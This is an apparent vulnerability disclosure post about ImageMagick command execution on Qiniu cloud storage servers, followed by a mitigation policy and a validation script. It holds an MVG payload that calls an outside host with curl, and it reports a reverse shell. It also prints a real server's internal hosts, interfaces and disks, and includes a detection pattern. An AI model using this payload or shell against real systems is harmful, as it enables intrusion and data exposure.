Qiniu Cloud Storage remote command execution vulnerability affects its image processing servers
程序员文章站
2022-03-29 12:04:29
Qiniu Cloud Storage uses ImageMagick for processing in its service. Because that software (extension) has a command execution vulnerability, it is possible to obtain control of Qiniu cloud storage servers directly.
For vulnerability details see:
http://www.openwall.com/lists/oss-security/2016/05/03/18
Exploitation process: call the Qiniu cloud storage upload interface and upload an "image" whose content is:
    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg"|curl "*.*.*.*)'
    pop graphic-context
My server's web log then received the following request:
183.136.128.155 - - [05/May/2016:11:34:30 +0800] "GET / HTTP/1.1" 200 11359 "-" "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
This proves the server can execute commands; I then bounced a shell back to my own machine:
    [email protected]:/home/qboxserver$ /sbin/ifconfig
    /sbin/ifconfig
    bond0     Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31
              inet addr:192.168.39.56  Bcast:192.168.39.255  Mask:255.255.255.0
              inet6 addr: fe80::6e92:bfff:fe08:4231/64 Scope:Link
              UP BROADCAST RUNNING MASTER MULTICAST  MTU:1500  Metric:1
              RX packets:1954421513004 errors:296 dropped:109669460 overruns:89056 frame:139
              TX packets:1830543349326 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:2185589994172355 (2.1 PB)  TX bytes:2267435507197833 (2.2 PB)

    eth0      Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31
              UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
              RX packets:1015834290209 errors:296 dropped:3 overruns:57652 frame:139
              TX packets:949789646132 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:1137441591036452 (1.1 PB)  TX bytes:1174420660158860 (1.1 PB)
              Memory:df7a0000-df7c0000

    eth2      Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31
              UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
              RX packets:938587222795 errors:0 dropped:3 overruns:31404 frame:0
              TX packets:880753703193 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:1048148403135903 (1.0 PB)  TX bytes:1093014847038820 (1.0 PB)
              Memory:df920000-df940000

    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:41448226032 errors:0 dropped:0 overruns:0 frame:0
              TX packets:41448226032 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:271458766242099 (271.4 TB)  TX bytes:271458766242099 (271.4 TB)

    [email protected]:/home/qboxserver$

    [email protected]:/home/qboxserver$ cat /etc/hosts
    cat /etc/hosts
    127.0.0.1 localhost nb443
    ::1 ip6-localhost ip6-loopback
    fe00::0 ip6-localnet
    ff00::0 ip6-mcastprefix
    ff02::1 ip6-allnodes
    ff02::2 ip6-allrouters
    192.168.1.188 salt puppetmaster
    192.168.33.200 zabbixserver bosunserver fileserver.qbox.me
    192.168.34.129 nb.fileserver.qbox.me
    192.168.48.248 ntp.ubuntu.com
    172.16.77.202 qmaster2
    172.16.77.201 qmaster1
    172.16.77.201 qmaster1
    172.16.77.202 qmaster2

    [email protected]:/home/qboxserver$ df -h
    df -h
    Filesystem      Size  Used Avail Use% Mounted on
    /dev/sda5       279G   75G  190G  29% /
    udev             16G   12K   16G   1% /dev
    tmpfs           6.3G  392K  6.3G   1% /run
    none            5.0M     0  5.0M   0% /run/lock
    none             16G   60K   16G   1% /run/shm
    /dev/sde1       3.7T  3.2T  293G  92% /disk1
    /dev/sdc1       3.7T  3.3T  220G  94% /disk2
    /dev/sdb1       3.7T  3.3T  254G  93% /disk3
    /dev/sdd1       3.7T  3.2T  283G  93% /disk4
    /dev/sdg1       3.7T  3.3T  203G  95% /disk5
    /dev/sdi1       3.7T  3.2T  278G  93% /disk6
    /dev/sdh1       3.7T  3.2T  285G  92% /disk7
    /dev/sdj1       3.7T  3.3T  245G  94% /disk8
    /dev/sdk1       3.7T  3.2T  301G  92% /disk9
    /dev/sdl1       3.7T  3.2T  262G  93% /disk10
    /dev/sdm1       3.7T  3.3T  256G  93% /disk11
    /dev/sdf1       3.7T   56G  3.4T   2% /disk12
With this many disks mounted there is close to 40T of data; I assume it is all static resources uploaded by customers.
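The root cause above is that a text file in MVG format was accepted as an "image" and handed straight to ImageMagick, whose https delegate then interpolated the url() argument into a shell command. The following check is an added example (not code from the post and not Qiniu's upload service); it verifies real raster magic bytes before anything reaches ImageMagick and flags vector text carrying a shell metacharacter inside url(). The sample inputs, including the callback address 203.0.113.10, are constructed.

```python
import re
from typing import Optional, Tuple

# Magic bytes of the raster formats the upload endpoint is meant to accept.
RASTER_MAGIC = {
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# A url(...) argument containing a shell metacharacter: the delegate
# injection described above builds a command line from this string.
SHELL_META = re.compile(rb"url\([^)]*[\"'|;&`$]", re.IGNORECASE)


def detect_format(data: bytes) -> Optional[str]:
    """Return the raster format whose magic bytes open `data`, else None."""
    for name, magic in RASTER_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def is_vector_text(data: bytes) -> bool:
    """True for MVG or SVG text, the inputs that reach ImageMagick delegates."""
    head = data[:512].lstrip().lower()
    return head.startswith(b"push graphic-context") or b"<svg" in head


def check_upload(data: bytes) -> Tuple[bool, str]:
    """Decide whether `data` may be handed to ImageMagick; returns (allowed, reason)."""
    if detect_format(data) is not None:
        return True, "raster magic bytes present"
    if is_vector_text(data):
        if SHELL_META.search(data):
            return False, "vector image with shell metacharacter in url()"
        return False, "vector image formats are not accepted"
    return False, "unknown file type"


# Constructed samples: the MVG payload shape from the post, with the masked
# callback host replaced by the documentation address 203.0.113.10, and a
# minimal JPEG/JFIF header.
MVG_PAYLOAD = (
    b"push graphic-context\nviewbox 0 0 640 480\n"
    b"fill 'url(https://example.com/image.jpg\"|curl \"203.0.113.10)'\n"
    b"pop graphic-context\n"
)
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
```

The magic-byte check is the part that would have stopped this upload; the metacharacter pattern only adds a log-worthy reason when a vector file is rejected.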
Solution:
Temporarily disable ImageMagick's dangerous coders through its policy file. Add the following to "/etc/ImageMagick/policy.xml":
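The policy entries the post meant to paste are not present in this copy. As an added example (not the post's own text, and not Qiniu's configuration), these are the coder and path restrictions recommended by the advisory linked above together with the later additions its authors published; they refuse the coders that reach external delegates or read indirect sources, which is exactly what the MVG upload above relied on:

```xml
<policymap>
  <!-- Disable coders that invoke external delegates (EPHEMERAL, URL, HTTPS),
       the text-based formats that can embed them (MVG, MSL, TEXT), and other
       coders that leave the process or read from arbitrary sources. -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
  <!-- Block "@file" indirect reads, which let a crafted input read any file. -->
  <policy domain="path" rights="none" pattern="@*" />
</policymap>
```

These entries go inside the existing policymap element of the installed policy.xml, and `convert -list policy` prints the rules ImageMagick actually loaded so the change can be confirmed on the processing host. The policy is a stopgap: upgrading ImageMagick and validating uploads by magic bytes before conversion are the lasting fixes.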